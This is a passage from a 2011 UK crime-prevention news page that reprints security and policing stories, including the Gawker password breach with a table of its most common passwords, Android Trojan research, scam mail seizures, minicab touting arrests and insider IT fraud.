Storms was commenting on the news that some e-mail addresses revealed in the Gawker hack belonged to employees of federal, state and local governments, and that hackers would use the information in targeted attacks to gain access to agency networks.

Duo provided a clearer idea of the scope of the threat to governments, pointing out that 15 of the accounts for which it had cracked password encryption belonged to people working at NASA, nine were assigned to users employed by Congress, and six belonged to employees of the Department of Homeland Security.

Both Gawker and a host of security experts, including Moore, Storms and those at Duo, urged users whose Gawker accounts had been exposed to change their passwords for other sites or services if those passwords were the same or similar to the one associated with Gawker.

Moore provided Computerworld with steps users can take to determine whether their e-mail addresses were among those accessed in the Gawker hack. Since then, Duo Security has created a Web-based tool that users can run to see if they have been "Gawkered."

--------------

FURTHER INFORMATION

The following table shows the top 100 "lazy passwords" that was used by some of the Gawker websites readership. These were gathered by the the Duo Security company and tabulated by us. The number in the brackets shows the number of Gawker readers who used the same "lazy password".

 TOP 1 to 20

 TOP 21 top 40

TOP 41 to 60

TOP 61 to 80

 TOP 81 to 100

 (2516) 123456

 (262) f**kyou

(167) pepper

 (138) tigger

(115) midnight

(2188) password

 (256) starwars

(165) jennifer

(137) charlie

(115) 123qwe

 (1205) 12345678

 (255) shadow

(165) 666666

(136) chicken

(114) scooter

 (696) qwerty

 (241) princess

(164) welcome

(135) nothing

(114) purple

 (498) abc123

 (234) cheese

(164) buster

(132) f**koff

(114) banana

(459) 12345

 (231) 123123

(161) Password

(130) deadspin

(113) matrix

(441) monkey

 (229) computer

(159) batman

(125) valleywa

(113) jezebel

(413) 111111

 (225) gawker

(158) 1q2w3e4r

(125) qwerty12

(113) daniel

(385) consumer

 (223) football

(158) maggie

(125) george

(111) hunter

(376) letmein

 (204) blafblah

(154) michelle

(124) swordfis

(111) freedom

(351) 1234

 (203) nintendo

 (153) pokemon

(124) summer

(110) secret

(318) dragon

 (199) 000000

 (153) killer

(122) asdf

(110) redsox

(307) trustno1

 (198) soccer

 (153) andrew

(121) matthew

(108) spiderma

(303) baseball

 (195) 654321

 (151) internet

(121)asdfg

(108) phoenix

(302) gizmodo

 (193) asdfasdf

 (150) biteme

(120) mustang

(108) joshua

 (300) whatever

 (185) master

 (148) orange

(119) yankees

(108) jessica

 (297) superman

 (183) michael

 (148) jordan

(117) hannah

(108) *sshole

 (276) 1234567

 (182) passw0rd

 (147) ginger

(117) asdfghjk

(108) asdf1234

 (266) sunshine

 (175) hello

 (145) 123

(117) 1qaz2wsx

(107) william

(266) iloveyou

 (170) kotaku

 (144) aaaaaa

(116) cookie

(107) qwertyui

So whats the problem ?

You may be asking the question, its only a web based magazine, so what if someone hacks into that !
As mentioned in the main article; once you have hacked into someones online account (regardless of what it is), they could get the individuals name, email address, perhaps their home address, companies they work for ( based on email address), bank details and perhaps more seriously an understanding of an individuals mentality regarding online security.

For example, are you a member of any online school reunion websites ? Are you are member of a family tree tracking website ? If so have you have made public what schools you attended, your date of birth and where you were born. These are sometimes used as further check passwords for online bank accounts ! All this information is normally all freely available to other members. Based on some of this information you could even legally ( for illegal use - ID theft ) obtain a copy of your birth certificate !

The people that hack these organisations are not spotty teenagers in their bedrooms, they are criminal businesses. Once they have the minimal piece of data on you they can start obtaining the rest.

Password recommendations

- Use at least 8 characters.
- Use capitals as well as lower case letters.
- Incorporate numbers amongst the letters ( alpha-numeric ), not just at the end.
- If the system allows, try and use symbols (& * % etc ) amongst the other characters.
- DO change your passwords on a regular basis.
- DON'T use names or place names.
- DON'T use dates of birth or even months of the year.

Main article sources

http://www.duosecurity.com/
Gawker online magazine website : http://gawker.com/
Computer World article : http://cwonline.computerworld.com/t/7046426/753476122/347203/0/


(2nd February 2011)


HACKERS TURN BACK THE CLOCK WITH TELNET ATTACKS
(Computerworld, dated 27th January 2011 author Jeremy Kirk)
www.computerworld.com

A new report from Akamai Technologies shows that hackers appear to be increasingly using the Telnet remote access protocol to attack corporate servers over mobile networks.

Akamai, which specializes in managing content and Web traffic, issues quarterly reports on Internet traffic trends. The latest report, which covers the third quarter of 2010, shows that 10% of attacks that came from mobile networks are directed at Port 23, which Telnet uses. That marks a somewhat unusual spike for the aging protocol.

Telnet is a remote access tool used to log into remote servers, but it has been gradually replaced by SSH, also known as Secure Shell. Administrators are generally advised to disable Telnet if the protocol is not used to prevent attacks targeting it, but some forget.

Although those attacks originated from mobile networks, Akamai said it did not appear that mobile devices were the source."As noted previously, we believe that the observed attack traffic that is originating from known mobile networks is likely being generated by infected PC-type clients connecting to wireless networks through mobile broadband technologies and not by infected smartphones or similar mobile devices," according to the report.

Including all types of attack traffic sources, about 17% of attacks were directed at Telnet. Port 23 was "overwhelmingly the top targeted port for attacks" in Egypt, Peru and Turkey, Akamai said."It is not clear if there is a common thread that connects these three countries, nor whether these observed attacks were brute-force login attempts or some other botnet-related traffic," the report said.

Akamai found that Port 445, which is a commonly used port for Microsoft products, was the most targeted one, although the attacks declined. The attacks peaked more than a year ago due to Conficker, a worm that rapidly spread and targeted the port.

"While the percentages are still fairly significant, this decline may signal ongoing efforts by network service providers to identify and isolate infected systems, as well as ongoing efforts to patch and/or upgrade infected systems," the report said.

Port 445 attacks were responsible for much of the attack traffic in Brazil, Germany, Italy, Russia, Taiwan and the US. In

China, however, attacks against SSH, which runs on Port 22, were more common than those against Port 445, Akamai said.

Latest Akamai report : http://www.akamai.com/stateoftheinternet/

(2nd February 2011)


 

FAIL : NASA OLD SPACE SHUTTLE PC'S WITHOUT WIPING SECRET DATA
(Computerworld, dated 8th December 2011 author Darlene Storm)
www.computerworld.com

For sale, used computer packed full of secret NASA Space Shuttle data. As part of a plan to securely end the Space Shuttle program, NASA is getting rid of old computers. However, NASA officials failed to delete sensitive data on PCs and hard drives before selling the equipment. The Office of Inspector General found "serious" security breaches at NASA centers in Florida, Virginia, Texas and California.

NASA is full of very bright minds, so how did it manage to make such a noob mistake of selling PCs without wiping the hard drives? An audit found 10 of 14 computers that failed tests to ascertain they'd been wiped properly. One computer that was to be sold still contained sensitive Space Shuttle data, which was subject to export control by the International Traffic in Arms Regulations.

All electronic storage media is supposed to be wiped of data "to the degree that there is reasonable assurance that the data cannot be retrieved or reconstructed," the audit stated. NASA approved software for sanitizing hard drives include DBAN (Darik's Boot and Nuke), Secure Erase, and WipeDrive/WipeDrive Pro. Contractors in charge of deleting sensitive information used DBAN and another product- which were not NASA approved at Johnson's disposition center. Ames used BCwipe, which is DOD compliant, but not NASA approved. USA used Symantec DateGone which is not approved by NASA, DOD or NSA.

At Kennedy, another contractor, Abacus Technology Corporation, attempts to recover data from digitally sanitized PCs. If data is recovered, the outside of the computer is marked in large red letters as FAIL. Auditors found that IT managers weren't notified when a drive failed or wasn't wiped free of data at all. Some officials at NASA facilities didn't account for or track hard drives. Additionally, the auditors were not at all pleased with the lack of verification testing that drives were properly sanitized of sensitive data.

Pallets, each filled with about 44 old PCs, were also found in the recycling facility with NASA stickers and IP addresses still attached to the cases. Auditors wrote, "Release of NASA Internet Protocol addresses is a potential security weakness because these addresses could provide a hacker a means to gain unauthorized access to NASA's internal network. Knowing a specific Internet Protocol address allows a hacker to target a particular computer, test the system for vulnerabilities, and possibly load malicious software programs or access information on the computer or network."

Hard drives were missing from Langley Research Center in Virginia  and from Kennedy. Some of those hard drives from Kennedy were later found inside a dumpster that was accessible to the public, the audit says.

All in the all, the report determined that NASA protocols to correctly sanitize data were not being followed at Kennedy and Johnson space centers and at Ames and Langley research centers. The auditors were not happy with the CIO who "stated that NASA's policies would be updated and a new handbook created by the third quarter of fiscal year 2011." The audit, prepared by NASA's Inspector General, covered a 12-month period starting in June 2009.

With all the WikiLeaks drama and the government demanding the return of sensitive documents and information, this blunder is just pitiful. It would seem as if this failure to wipe sensitive data would leave NASA and the government red-faced.

(2nd February 2011)



MET POLICE SEIZING SCAM MAIL AIMED AT UK VICTIMS
(BBC NEWS, dated 25th January 2011)
www.bbc.co.uk

Scotland Yard detectives are working to seize thousands of items of scam mail aimed at people in the UK. It will be the first seizure of such post by the Metropolitan Police's economic and specialist crime command.

 

The letters are sent by professional fraudsters and encourage people to invest in schemes like fake lotteries. Police say an estimated £3.5bn is scammed from UK citizens each year and about £2.4bn of this is believed to be as a result of mail scams.

The police operation - which is being run in partnership with Royal Mail and international mail service provider Spring Global Mail - is part of a long-running police investigation into the organised criminal networks behind such scams.They expect to recover up to 5,000 items of mail.

Also involved are Lancashire Police and council trading standards offices in Westminster, Kent, East Sussex and Hampshire.

The mail being seized on Tuesday is being taken from the Spring Global Mail centre, which is passing suspect letters on to police.

People from abroad are able to post their mail to the UK and Spring Global Mail will re-post it, making it look as though it was posted in UK, a legal practice which criminals are taking advantage of.

The Met say Spring Global Mail have done nothing wrong, and many other companies use similar services to make mail originating abroad appear as if it was posted in the UK.

The police also say they analysed some 3,000 scam letters and only one fifth were sent using this service, know as "local look".

Targeted recipients
 
As well as the mail seizure, five return addresses or "virtual offices" in London identified as part of the scam process are being shut down and searched for criminal evidence.

These addresses consist of privately rented mail boxes.

The fraudsters, who send letters from several overseas countries, try to persuade people to part with money on false promises of holidays or luxury items.

After replying to one of these so-called "tempter letters" a victim's name is put on what is called a "suckers list" and sold to criminals all over the world.

These lists comprise many vulnerable people, including the elderly, who will be bombarded with mail.

Some have ended up in desperate financial straits, and some with health problems. According to the Metropolitan Police, there have been at least five suicides involving postal scam victims.

Detective Superintendent Mark Ponting, of the Met, said once people reply to one letter they are targeted by hundreds more every week, and can find it hard not to reply to others.

"I've met quite a few now, several dozen individuals, who find it difficult if not often impossible, once they're hooked, to stop responding to the mailings," he said.

"So you can give them all the consumer education in the world and actually, once they're hooked, they're not going to stop."

Parliamentary Bill
 
Gary Simpson, international director at Royal Mail, said: "We don't want any of our postmen or women handling or delivering mail that causes harm or is criminal in intent.

"Royal Mail is working hard with the police to clamp down on this type of distressing activity."

Meanwhile, Conservative MP Caroline Nokes is putting a Bill through Parliament that would enable police and customs to be able to seize some of the scam mail which enters the country.

But although it could raise awareness of the issue, her Bill has little chance of becoming law because of a lack of parliamentary time.

Ms Nokes said some victims received more than 100 letters a day after being targeted by fraudsters, and that criminals also used the telephone and e-mails.

However, police were aware of how and where some scam mail entered the country but were unable to stop it, the MP said.

She said trading standards officers were keen for the police, customs officers, and the National Fraud Authority to intercept scam mail, and for Royal Mail to disclose the details of potential victims to the local trading standards service.

"I do not suggest for one moment that there should be a blanket power to intercept mail without a warrant, but such mail is easy to identify, the same victims are being targeted hundreds and hundreds of times over and it ought not to be impossible to introduce appropriate safeguards against breaches of human rights," she said.

Ms Nokes also accepted that current data protection and human rights legislation could prevent interceptions.

(25th January 2011)


 

SAFER TRAVEL AT NIGHT - CHRISTMAS CRACKDOWN ON ILLEGAL CAB DRIVERS SEES 177 ARRESTS
(Transport for London website, dated 20th January 2011)
www.tfl.gov.uk

Safer Transport Command officers stepped up enforcement action against illegal cab drivers over the festive period.

- 177 drivers arrested for touting and 27 arrested for other cab-related offences
- New windscreen stickers used to warn drivers against illegal touting
- Officers warn 50,000 Londoners of the dangers in taking unbooked minicabs
The Metropolitan Police Service (MPS) Cab Enforcement Unit, part of the Transport for London (TfL) funded Safer Transport Command (STC), has arrested over 150 drivers for taxi touting over the festive period.

Any 'minicab' that isn't booked through a licensed minicab operator is illegal, uninsured for carrying passengers and potentially dangerous.

The operation was an integral part of the Safer Travel at Night (STaN) initiative, which is a partnership between the Mayor, TfL, MPS and the City of London Police (CoLP), who are working together to make travelling in London safer at night.

The police were supported by officers from TfL's Taxi and Private Hire Compliance and Enforcement Teams.

It involved over 300 enforcement activities at targeted locations across London with officers from the STC Cab Enforcement Unit, Safer Transport Teams, CoLP and TfL using various tactics to deter, disrupt and detect illegal cab drivers and get people home safely.

Along with high-visibility patrols, stop/checks on vehicles, intelligence-led operations and engaging with the public, officers used a new series of material aimed at raising awareness of touting and the enforcement action being taken against this illegal and dangerous activity.

Warning stickers get the message across

Operations over the festive period saw the introduction of large windscreen stickers that are place on cars of people arrested on suspicion of illegally touting.

The new stickers, which state 'Driver arrested on suspicion of touting', are a warning to other drivers that touting will not be tolerated and that police and enforcement officers are taking action.

In addition to the vehicle stickers, officers were also carrying out roadside checks of vehicles and drivers and distributing leaflets to drivers and passengers reminding drivers of the law and the consequences of acting illegally.

Over 2,000 minicabs were stopped during the operation.

Posters have also been produced for all licensed private hire offices warning licensed drivers that if they tout for business they will lose their TfL licence.

Operation STaN covered every borough in the Capital, where officers from the Cab Enforcement Unit, Safer Transport Team, CoLP and TfL engaged with thousands of Londoners.

The officers provided safer travel at night  information informing the public that only black cabs can be stopped and picked up off the street without being booked and that minicabs, even those licensed by TfL, must always be booked through a licensed minicab operator.

Over 50,000 STaN leaflets were handed out to members of the public.

The safe way to take minicabs

Kulveer Ranger, the Mayor's Transport Adviser, said: 'It is good to see that thousands of Londoners have heeded the important advice and avoided the potential dangers of illegal minicabs this winter.

'However tempting illegal minicabs may seem, we need to use common sense and ensure we travel around the city as safely as possible by using black taxis and booking licensed minicabs. I want to thank all the hard working police officers who have made this operation such a great success.'

Chief Superintendent Joe Royle, Safer Transport Command, said: 'The Cab Enforcement Unit is dedicated to tackling taxi touts and this was an excellent result.

'The dangers of taking unlicensed minicabs should never be underestimated. Illegal cabs and touting undermine the legitimate cab trade. Our Cab Enforcement Unit has dedicated anti-tout initiatives to tackle touts and improve the safety of passengers who use taxis and private hire vehicles.
 
'Working with our partner agencies there are now many alternatives to ensure that by planning a journey home in advance, an evening out ends safely.'

Steve Burton, TfL's Director of Community Safety, Enforcement and Policing, said: 'The arrests over the festive period highlight the work that TfL and its policing partners are doing in order to stop illegal cab drivers operating in London. We are committed to tackling illegal touting and ensuring a safe travelling environment for the public.

'However as part of our efforts to crackdown on illegal cab activity we also need Londoners to stop taking unbooked minicabs. Only black cabs can be hailed in the street or picked up at a rank without booking.'

Key tips on using minicabs

- Never approach a minicab on the street or accept a fare, they are acting illegally
- Always book so there is a record of your journey
- Only black cabs can pick passengers up on the street
- When travelling by minicab always book it, when it is arrives check it's for you and sit in the back
- To get three local cab numbers text 'CAB' to 60835**

Visit www.tfl.gov.uk/cabwise for more information


 

Further information

Since 2003 the Cab Enforcement Unit has made more than 6,000 arrests for touting and cab-related offences.

If you have had a bad experience in a minicab or taxi (black cab), please report the incident at tfl.gov.uk/contactcabs, call 0845 300 7000, or email TPH.Comms@tfl.gov.uk

Help and support is available for victims of sexual assault from The Havens.  Details can be found at thehavens.co.uk

TfL's 24 hour travel information call centre can also provide information and phone numbers for taxi and private hire services in London.  Call 0843 222 1234

(25th Janaury 2011)


 

SOUNDMINDER TROJAN HORSE STEALS ANDROID PHONE DATA
(Computerworld, dated 20th Janaury 2011 author Jeremy Kirk )
www.computerworld.com

Researchers have developed a low-profile Trojan horse program for Google's Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software.

The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone's keypad, according to the study.

Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said.

The study was done by Roman Schlegel of City University of Hong Kong and Kehuan Zhang, Xiaoyong Zhou, Mehool Intwala, Apu Kapadia, XiaoFeng Wang of Indiana University in Bloomington, Indiana.

"We implemented Soundminer on an Android phone and evaluated our technique using realistic phone conversation data," they wrote. "Our study shows that an individual's credit card number can be reliably identified and stealthily disclosed. Therefore, the threat of such an attack is real."

Soundminer is designed to ask for as few permissions as possible to avoid suspicion. For example, Soundminer may be allowed access to the phone's microphone, but further access to transmit data, intercept outgoing phone calls and access contact lists might look suspicious.

So in another version of the attack, the researchers paired Soundminer with a separate Trojan, called Deliverer, which is responsible for sending the information collected by Soundminer.

Since Android could prevent that communication between applications, the researchers investigated a stealthy way for Soundminer to communicate with Deliverer. They found what they term are several "covert channels," where changes in a feature are communicated with other interested applications, such as vibration settings.

Soundminer could code its sensitive data in a form that looks like a vibration setting but is actually the sensitive data, where Deliverer could decode it and then send it to a remote server. That covert vibration settings channel only has 87 bits of bandwidth, but that is enough to send a credit card number, which is just 54 bits, they wrote.

Soundminer was coded to do the voice and number recognition on the phone itself, which avoids the need to send large chunks of data through the network for analysis, which might again trigger an alert from security software.

If it is installed on a device, users are likely to approve of the settings that Soundminer is allowed to use, such as the phone's microphone. Since Soundminer doesn't directly need network access due to its use of a covert side channel to send its information, it is unlikely to raise suspicion.

Two antivirus programs for Android, VirusGuard from SMobile Systems and Droid Security's AntiVirus, both failed to identify Soundminer as malware even when it was recording and uploading data, according to the researchers.

In an e-mail statement, Google officials in London did not directly address Soundminer but said that Android is designed to minimize the impact of "poorly programmed or malicious applications if they appear on a device."

"If users believe an application is harmful or inappropriate, they can flag it, give it a low rating, leave a detailed comment, and of course, remove it from their device," Google said. "Applications deemed to be in violation of our policies are removed from Market, and abusive developers can also be blocked from using the Android Market for repeated or egregious violations of our policies."

Editors Note

This article describes an accademic exercise. You may feel that this exercise would not exist in the real world. The thing is criminal hacking teams often have millions of pounds at their disposal to carry out their own research and development of such intrusive software. With more and more "apps" being created to "make our life easier" criminals are becoming more adept in taking advantage of them.

(25th January 2011)


 

FRAUDSTERS MONEY MULES IN SHORT SUPPLY
(Computerworld, dated 20th January 2011 author Jeremy Kirk )
www.computerworld.com

A new security report from Cisco Systems estimates that the amount of stolen online bank account data far exceeds the number of people fraudsters can get to transfer stolen funds, who are known as "money mules."

A mule is someone who either knowingly helps or is tricked into moving money from a victim's bank account through their own account and then onto a third party, usually located in another country.

Despite increasing awareness of the schemes, which are often advertised as "work-at-home" jobs with generous salaries, many people still get caught up in the frauds.

Cisco said in its 2010 Annual Security Report that the ratio of stolen account credentials -- which can be acquired through phishing or hacking -- to available mule capacity could be as high as 10,000 to one.

Being a mule is a high-risk job, and many are caught. Last year, dozens of people were arrested in the U.S. and U.K. on charges they were part of a large gang that stole money from bank accounts using a sophisticated piece of malware known as the Zeus program.

Many of those arrested in both countries were from Eastern Europe. In the U.S., many had gained entry to the country on J-1 non immigrant visas, often granted to visiting students.

Those running the scam will often use a mule only once, since authorities are likely to shut down the mule's account quickly. The money is transferred from the victim's account to the mule's account, and the mule is then instructed to quickly withdraw the money and either do a wire transfer or an ACH (Automated Clearing House) transfer.

The ACH system is used by financial institutions for exchanging details of direct deposits, checks and cash transfers made by businesses and individuals. It can be used to send very large sums of money, which are difficult to recover once the money makes it to an account, for example, in the Ukraine.

If banks detect the fraud, the institutions can try to reverse the transfer, but it is "not a quick and easy process" to initiate, Cisco wrote in its report. The reason is that if a fraudster has started to withdraw some of the money, the reversal won't work.

"The appropriate thing for the bank to do is to keep trying with progressively smaller amounts until it succeeds in recouping at least a portion of the stolen money," according to Cisco's report. "However, many banks are not sophisticated enough to do this, and the money is lost."

(25th Janaury 2011)


 

TWITTER HIT BY FAKE ANTI-VIRUS SOFTWARE SCAM
(Computerworld, dated 21st January 2011 author Jeremy Kirk)
www.computerworld.com

Twitter has been resetting passwords for accounts that started distributing links promoting fake antivirus software in an attack that used Google's Web address shortening service to conceal the links' destination.

The links, masked by Google "goo.gl" URL shortener, bounce through a series of redirect URLs before landing on a Ukrainian top-level domain that then redirects to an IP address associated with other fake antivirus software scams, wrote Nicolas Brulez of Kaspersky Lab.

Victims landing on the fake antivirus software page are prompted to scan their computer. If they approve the scan, the page asks if they want to remove threats from their computer: doing so starts the download of a bogus security program called "Security Shield."

Fake antivirus programs remain a pervasive problem on the Internet, with hundreds of variations. The applications target Windows users, and the programs are often installed by exploiting vulnerabilities in a computer's software. Once installed, the applications badger users to pay for a full version of the program. Many of the programs are totally ineffective at actually removing malware from a computer.

Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that "we're working to remove the malware links and reset passwords on compromised accounts."

"Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?" she wrote. "That's malware. Don't install."

Although Brulez classifed the attack as a worm, implying it spreads from account to account, Harvey said the issue was not related to a worm.

If the problem isn't spreading between Twitter users, that raises the question of how the attack began.

One possibility is that it is related to an attack on Gawker Media in December. In that incident, the e-mail addresses and passwords for registered users of the media company's Web sites were pilfered by a group called Gnosis. Twitter saw a raft of spam after the Gawker hack, as it is believed that many users used the same password for the Web sites, which made their Twitter accounts vulnerable.

(25th January 2011)


 

TRAPSTER HACK MAY HAVE EXPOSED MILLIONS OF iPOD, ANDROID PASSWORDS
(Computerworld, dated 20th January 2011 author Gregg Keizer)
www.computerworld.com

Millions of e-mail addresses and passwords may have been stolen from Trapster, an online service that warns iPhone, Android and BlackBerry owners of police speed traps, the company announced yesterday.

California-based Trapster has begun alerting its registered users and has published a short FAQ on the breach. "If you've registered your account with Trapster, then it's best to assume that your e-mail address and password were included among the compromised data," the FAQ stated.

But in the next breath, Trapster downplayed the threat, saying it wasn't sure that the addresses and passwords were actually harvested.

"While we know that we experienced a security incident, it is not clear that the hackers successfully captured any e-mail addresses or passwords, and we have nothing to suggest that this information has been used," Trapster said.

And when replying to follow-up questions today, Trapster claimed that not all its 10 million users were at risk.

"Only a portion of our users were affected," a company spokesman said via e-mail. "We are choosing not to provide a specific figure, but a majority of our users who download the app do not register, which means they did not provide an e-mail address, as it is not a requirement. So the figure is well below the 10 million users which has been reported."

Users must register with Trapster, and provide an e-mail address and password for the new account, in order to report speed traps. According to the Trapster site, more than 5,300 speed traps have been reported to the service so far today.

If criminals did collect the service's complete user list, the breach would be 25 times larger than the Gawker hack last month, when details of more than 400,000 Gawker accounts were published on the Internet.

Assuming just one-in-10 users registers with Trapster, the number of compromised passwords could still be two-and-a-half times bigger than Gawker's.

Trapster provides free apps for the iPhone, Android-based smartphones, the BlackBerry, Windows Mobile phones, and Garmin and TomTom GPS devices. The apps display a map with suspected speed traps -- the traps are reported by users of the service -- and warn when drivers are approaching a potential radar zone.

The danger posed to users is not limited to their Trapster accounts, a security expert pointed out today.

"You may not care very much if your credentials on Trapster have been compromised and may think that not too much harm can come from that," said Graham Cluley, a senior technology consultant with U.K.-based Sophos, in a post Thursday to the security company's blog. "But what if you use the same e-mail address/password combination on other Web sites such as your Twitter account, or Web e-mail address?"

Trapster website :www.trapster.com

Note : Trapster maybe an American company, but it does operate within the UK and does have UK customers.

Conversely, save money by driving within the speed limit !

(25th January 2011)


 

SECURITY FAIL : WHEN TRUSTED IT PEOPLE GO BAD
(Computerworld, dated 18th January 2011, author Tam Harbert )
www.computerworld.com

Note : the following is an extract of an article that described 3 actual cases of IT fraud and sabotage within the workplace.

For the full article go to :

http://www.computerworld.com/s/article/9204581/Security_fail_When_trusted_IT_people_go_bad?taxonomyId=17&pageNumber=1

-------------------------------------------


It's a Chief Information Officers (CIO) worst nightmare: You get a call from the Business Software Alliance (BSA), saying that some of the Microsoft software your company uses might be pirated.

You investigate and find that not only is your software illegal, it was sold to you by a company secretly owned and operated by none other than your own IT systems administrator, a trusted employee for seven years. When you start digging into the admin's activities, you find a for-pay porn Web site he's been running on one of your corporate servers. Then you find that he's downloaded 400 customer credit card numbers from your e-commerce server.

And here's the worst part: He's the only one with the administrative passwords.

Think it can't happen? It did, according to a security consultant who was called in to help the victim, a $250 million retailer in Pennsylvania. You never heard about it because the company kept it quiet.


An annual survey by CSO magazine, the U.S. Secret Service and CERT (a program of the Software Engineering Institute at Carnegie Mellon University) routinely finds that three quarters of companies that are victimized by insiders handle the matter internally, says Dawn Cappelli, technical manager of CERT's threat and incident management team. "So we know that [what's made public] is only the tip of the iceberg," she says. ( www.cert.org )

By keeping things quiet, however, victimized companies deny others the opportunity to learn from their experiences. CERT has tried to fill that void. It has studied insider threats since 2001, collecting information on more than 400 cases. In its most recent report, 2009's "Common Sense Guide to Prevention and Detection of Insider Threats" (download PDF), which analyzes more than 250 cases, CERT identifies some of the most common mistakes companies make: inadequate vetting during the hiring process, inadequate oversight and monitoring of access privileges and overlooking of red flags in behavior.

But threats from privilege-laden IT employees are especially hard to detect. For one thing, staffers' nefarious activities can look the same as their regular duties. IT employees routinely "edit and write scripts, edit code and write programs, so it doesn't look like anomalous activity," Cappelli says. And they know where your security is weakest and how to cover their tracks. You can't rely on technology, or any single precaution to protect yourself from rogue IT people. You have to look at the big picture.

"It requires not only looking at what they are doing online but also what's happening in the workplace," says Cappelli. "People really need to understand the patterns here, the story behind the numbers."

Computerworld went looking for some of those stories behind the numbers, incidents that have not been widely reported. Though the victimized companies wouldn't talk, the security consultants who helped clean up the messes would. Although each story has unique circumstances, together they show some of the typical patterns that CERT emphasizes. Employer, beware.


####Pirating software -- and worse

The Pennsylvania retailer's tale of woe began in early 2008, when the BSA notified it that Microsoft had uncovered licensing discrepancies, according to John Linkous. Today, Linkous is chief security and compliance officer at eIQ Networks, a security consultancy. His experience with the incident involving the retailer is from his previous job, when he was vice president of operations at Sabera, a now-defunct security consultancy.

Microsoft had traced the sale of the suspect software to a client company's sysadmin. For purposes of this story, we'll call that sysadmin "Ed." When Linkous and other members of the Sabera team were secretly called in to investigate, they found that Ed had sold more than a half-million dollars in pirated Microsoft, Adobe and SAP software to his employer.

The investigators also noticed that network bandwidth use was abnormally high. "We thought there was some kind of network-based attack going on," says Linkous. They traced the activity to a server with more than 50,000 pornographic still images and more than 2,500 videos, according to Linkous.

In addition, a forensic search of Ed's workstation uncovered a spreadsheet containing hundreds of valid credit card numbers from the company's e-commerce site. While there was no indication that the numbers had been used, the fact that this information was contained in a spreadsheet implied that Ed was contemplating either using the card data himself or selling it to a third party, according to Linkous.

The Chief Financial Officer (CFO), who had originally received the call from the BSA, and others on the senior management team feared what Ed might do when confronted. He was the only one who had certain administrative passwords -- including passwords for the core network router/firewall, network switches, the corporate VPN, the HR system, the e-mail server administration, Windows Active Directory administration, and Windows desktop administration.

That meant that Ed could have held hostage nearly all the company's major business processes, including the corporate Web site, e-mail, financial reporting system and payroll. "This guy had keys to the kingdom," says Linkous.

So the company and Linkous' firm launched an operation right out of Mission: Impossible. They invented a ruse that required Ed to fly overnight to California. The long flight gave Linkous' team a window of about five and a half hours during which Ed couldn't possibly access the system. Working as fast as they could, the team mapped out the network and reset all the passwords. When Ed landed in California, "the Chief Operating Officer (COO) was there to meet him. He was fired on the spot."

###Cost to the company

Linkous estimates that the incident cost the company a total of $250,000 to $300,000, which includes Sabera's fee, the cost of flying Ed to the West Coast on short notice, the cost of litigation against Ed, the costs associated with hiring a temporary network administrator and a new CIO, and the cost of making all of its software licenses legitimate.

###Preventive measures

What could have prevented this disaster? Obviously, at least one other person should have known the passwords. But more significant was the lack of separation of duties. The retailer had a small IT staff (just six employees), so Ed was entrusted with both administrative and security responsibilities. That meant he was monitoring himself.

Separating duties can be a particularly tough challenge for companies with small IT staffs, Linkous acknowledges. He suggests small companies monitor everything, including logs, network traffic and system configuration changes, and have the results evaluated by someone other than the system administrator and his or her direct reports. Most important, he says, is to let IT people know that they are being watched.

Second, the company failed to do a thorough background check when it hired Ed. In CERT's research, 30% of the insiders who committed IT sabotage had a previous arrest history. In fact, any kind of false credentials should raise a red flag. Although the company had done a criminal background check on Ed (which was clean), it did not verify the credentials on his résumé, some of which were later found to be fraudulent. (He did not, for example, have the MBA that he claimed to have.)

Third, Ed's personality could have been viewed as a red flag. "He seemed to believe that he was smarter than everyone else in the room," says Linkous, who met Ed face-to-face by posing as an ERP vendor before the sting operation. Ed's arrogance reminded Linkous of the infamous Enron executives. "He was extremely confident, cocky and very dismissive of other people."

CERT has found that rogues often have prickly personalities. "We don't have any cases where, after the fact, people said, 'I can't believe it -- he was such a nice guy,'" says Cappelli.

(25th January 2011)

 

 

 

 

 

 


 

NORFOLK BOOSTS CHILD PROTECTION
(Norfolk Police, dated 21st January 2011)

Vulnerable children in Norfolk are set to benefit from more joined up working between agencies as the county council, police and partners look to create a Multi-agency Safeguarding Hub (MASH).

The MASH, which is set to be up and running by June, will initially bring staff from Norfolk County Council and Norfolk Constabulary under one roof, sharing information and responding quickly to child protection concerns. Community Services, health services and other agencies will also be involved at a later stage to better safeguard both vulnerable children and adults.

The MASH will mean that when a child protection enquiry comes into the county council, officers from different agencies will be able to immediately discuss the background of the case and make a joint visit, if necessary.

Although the police and county council already work closely together, with their partners, bringing the teams into one location will speed up communication and assessment.

Alison Thomas, Norfolk County Council's Cabinet Member for Children's Services, said: "Child protection continues to be one of our main priorities and we want to do all we can to keep children safe from harm.

"Currently in more than half of our referrals we need to speak to the police, particularly if there are issues with domestic violence or suspected abuse. By having a joint team we will be able to respond more quickly, avoid duplication and therefore provide a service that is more effective and offers the best value for money.

"In these challenging economic times we need to focus on acting swiftly to prevent problems from escalating, this reduces financial and human costs. We know that this model has been effective elsewhere in the country and we are keen to develop it within Norfolk.

"The success of this project is dependant on other partners coming on board and, although the hub will initially be made up of county council and police staff, we are hopeful other big partners, including those in the health service, will come on board as soon as possible.

"I was at a workshop in the summer when this project was discussed for the first time and I am passionate about its benefits and keen and excited to see it developed."

The scheme is based on a similar model in Devon, a county very similar to Norfolk and one of its statistical neighbours. There it has led to cases being processed much more effectively and there has been a reduction in formal referrals because issues have been addressed at an early stage.

Assistant Chief Constable Kevin Wilkins, of Norfolk Constabulary, said: "The recently finalised Norfolk Police Children & Young People Strategy reinforces the constabulary's commitment to build strong partnerships. The new multi-agency safeguarding Hub (MASH) realises true partnership working, with critical partners sharing systems, processes, people and intelligence in one location, reducing bureaucracy, time and cost.

"We know that young people who are exposed to risk factors including; abuse, domestic violence, drugs and crime within the family unit are more likely to commit crime themselves. This MASH will enable the police, county council and other partners to deliver joint identification, assessment and action.

"This will ultimately improve outcomes for young people, providing more effective and targeted services to these groups by identifying early those who are most at risk of harm."

In Norfolk, the scheme is still in the early stages of development but it is hoped other agencies will come on board as the project develops. For the last two months a MASH project group has been meeting made up of representatives from Norfolk County Council (Children's and Community Services), police, health and probation. The MASH is likely to be based at a council building within Norwich.

(21st January 2011)


 

